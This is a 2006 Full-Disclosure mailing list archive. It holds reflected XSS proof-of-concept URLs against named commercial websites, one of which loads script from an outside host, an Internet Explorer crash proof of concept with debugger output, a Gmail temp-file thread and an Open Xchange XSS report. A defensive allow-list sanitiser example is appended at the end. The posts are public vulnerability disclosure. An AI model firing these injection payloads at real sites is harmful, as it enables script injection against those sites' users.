http://cybertrust.com/cgi-bin/htsearch?words=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://www.pandasoftware.com/com/virus_info/encyclopedia/results.aspx?termino=
 google.com>&tipoBusqueda=vi
http://fr.trendmicro-europe.com/search/?entity=enterprise&master=true&searchword=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Greets,
Thomas
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] bugs

2006-08-06 Thread Thomas Pollet
Hi,
I have found ie crashing when refreshing an iframe containing an xml file with xsl stylesheet (takes a while to crash).
I used this html:

<!-- the iframe holds input.xml; the iframe and script tags were stripped by the archive and are restored here from the description -->
<iframe src="input.xml"></iframe>
<script>
// reload the iframe's XML document every 20 ms until the browser crashes
function refresh() {
  frames[0].window.location.reload();
  setTimeout("refresh();", 20);
}

refresh();
</script>
-- input.xml is calling an xsl stylesheet (cfr. attachment) --

w2k:
msxml3.dll:69B76B61 mov     eax, [esi]
msxml3.dll:69B76B63 mov     ecx, esi
msxml3.dll:69B76B65 call    dword ptr [eax+48h]
with esi=0

MSHTML.DLL:637840E8 test    byte ptr [eax+44Dh], 20h
with eax=0

xp:
msxml3.dll:74992156   8B43 14  MOV EAX,DWORD PTR DS:[EBX+14]
EBX=0

Seem like nullpointer derefs. Weird thing is it crashes on different addies, can somebody shed some light on why this is?

obligatory xss:
http://search.oracle.com/search/search?keyword=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&start=1&nodeid=&fid=&showSimilarDoc=true&group=All secure search, lol?
oreilly.com: search powered by http://promosearch.atomz.com/search/promosearch?query=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&sp-q=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&sp-a=sp1000a5a9&sp-f=ISO-8859-1&sp-t=general&sp-x-1=cat&sp-q-1=&sp-x-2=cat2&sp-q-2=&sp-c=25&sp-p=all&sp-k=Articles%7CBooks%7CConferences%7COther%7CWeblogs&c=&p=
http://www.altavista.com/web/results?itag=ody&q=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&kgs=1&kls=0
http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?pid=%22%3E%3Cscript%3Ealert(1)%3C/script%3Ey00&source=cnn&url=""
http://www.ask.com/web?q=%2BADw-%2Ftitle%2BAD4-%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&qsrc=1&o=333&l=dir
http://search.amd.com/query.html?col=idx1&qt=amd+%22%3E+%3Cscript%3E+alert%281%29+%3C%2Fscript%3E&charset=iso-8859-1&qp=url%3A%2Fus-en%2F+url%3A%2Fsg-en%2F+url%3A%2Fepd%2F&qs=%7C+language%3Aen&la=en&lap=en&qm=1&tqmhak=0
http://www.amazon.com/s/ref=nb_ss_gw/103-7930143-9476650?ie=UTF-8&url="">
http://search.hp.com/query.html?charset=iso-8859-1&la=en&hpvc=sitewide&qs=&nh=10&lk=1&rf=0&uf=1&st=1&qt=hp+%27%22y00--%3E%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E&submitsearch.x=0&submitsearch.y=0
http://us.mcafee.com/virusInfo/ : enter following in virus search: (use POST form for exploit) ">alert(1)

cheers,
Thomas

(attachment residue, tags stripped by the archive: input.xml holding sample records such as "Bugs Bunny 03/21/1970 31 4895 Wabbit Hole Road 865-111-" through "Road Runner 01/19/1953 48 135 Desert View Street none", and an XSL stylesheet in the http://www.w3.org/1999/XSL/Transform namespace, version 1.0, printing the fields NAME, DOB, AGE, ADDRESS and PHONE)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Gmail emails issue

2006-08-04 Thread Thomas Pollet
He means a temp folder on the gmail server.
I verified an attachment being available even after being signed out.

On 04/08/06, Stan Bubrouski <[EMAIL PROTECTED]> wrote:
I'm reading your message in gmail and there is nothing in my temp folder... not that I'd expect there to be.  Gmail can't just create files on your computer without your permission, if it can your settings are wrong or your browser is broken.  In other words if your gmail mails are ending up in your temp folder your web browser is putting them there...  what browser are you using BTW.  I'm using firefox and it doesn't store my mails in the temp folder under my NT account.

-sb

On 8/4/06, 6ackpace <[EMAIL PROTECTED]> wrote:
>
> Hi All,
>
> Gmail stores mails in Temp folder for faster access. But I have observed it
> fails to remove mail from the temp files after the session is ended.
>
> Any user who has physical access to the system can read mail and
> contact information of the Gmail user.
>
> Discloses information which is private and confidential?
>
> thank you
>
> ratna
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Open Xchange XSS

2006-01-03 Thread Thomas Pollet
Open Xchange webmail (<=0.8.1-6) suffers from xss.

http://mirror.open-xchange.org/ox/EN/community/

Vendor response:

For the commercial OX you don't need this as there exists additional security
options where you will not be able to use this session. It's a general problem for
all web based mailers and some of them try to filter such scripts, some of them
do not and show a warning instead that the document may contain "dangerous
content". But you will never be able to filter all possible scriptings.
Displaying HTML content is ALWAYS an unsecure option, so it is recommended to
disable "Inline HTML" at the WebMail options. Anyway, I will check if I can make
some basic filter to get most of such tags.

Cheers,

Thomas

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
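The vendor response in the Open Xchange post argues that a filter can never catch all possible scripting in displayed HTML mail. That is true of a deny-list filter; the usual way out is to stop enumerating dangerous constructs and allow-list a few harmless ones instead. The block below is an added example and is not Open-Xchange's code: `escapeHtml`, `sanitizeInlineHtml`, `denylistFilter`, `containsActiveContent`, `compare` and the list of allowed tags are choices of this example, and the mail body it checks is constructed.

```javascript
// Added example (not from Open-Xchange): allow-list sanitising of an HTML
// mail body for inline display, contrasted with the "strip <script>" style
// of filter the vendor response says can never be complete.

// Tags that are re-enabled after escaping (assumption of this example). No
// attributes are ever allowed, so event handlers, href/src URLs and style
// cannot come through.
const ALLOWED_TAGS = ['b', 'i', 'em', 'strong', 'p', 'br'];

// Escape every character with meaning in HTML text or attribute context.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Escape everything, then turn back only bare <tag>, </tag> and <tag/> for
// the allowed names. A tag carrying any attribute stays visible as escaped
// text; a stray closing tag that survives is ignored by browsers.
function sanitizeInlineHtml(html) {
  const escaped = escapeHtml(html);
  const bareTag = new RegExp(
    '&lt;(/?)(' + ALLOWED_TAGS.join('|') + ')(\\s*/?)&gt;', 'gi');
  return escaped.replace(bareTag, (match, slash, name, tail) =>
    '<' + slash + name.toLowerCase() + (tail.trim() ? '/' : '') + '>');
}

// A deny-list filter of the kind the vendor response describes: it removes
// <script> elements and nothing else.
function denylistFilter(html) {
  return String(html).replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '');
}

// Constructed mail body: harmless markup, an inline event handler on an
// otherwise allowed tag, and a script element.
const SAMPLE_BODY =
  '<p>Hello <B>reader</B><br/></p>' +
  '<b onmouseover="run()">hover me</b>' +
  '<script>run()</script>';

// Does the output still contain a raw tag carrying attributes, or a script?
function containsActiveContent(html) {
  return /<[a-z]+\s+[^>]*>/i.test(html) || /<script/i.test(html);
}

// Returns { denylist, allowlist }: whether active content survived each filter.
function compare() {
  return {
    denylist: containsActiveContent(denylistFilter(SAMPLE_BODY)),      // true
    allowlist: containsActiveContent(sanitizeInlineHtml(SAMPLE_BODY)), // false
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(denylistFilter(SAMPLE_BODY));
  console.log(sanitizeInlineHtml(SAMPLE_BODY));
  console.log(compare());
}
```

The escape-then-reenable structure is what makes the allow-list cheap to reason about: the only way a raw `<` can appear in the output is through the one regex that re-creates attribute-less tags from a fixed name list, so there is no list of "dangerous" tags or attributes to keep current. Real mail needs more than six tags, but every addition should be another bare tag name, never an attribute.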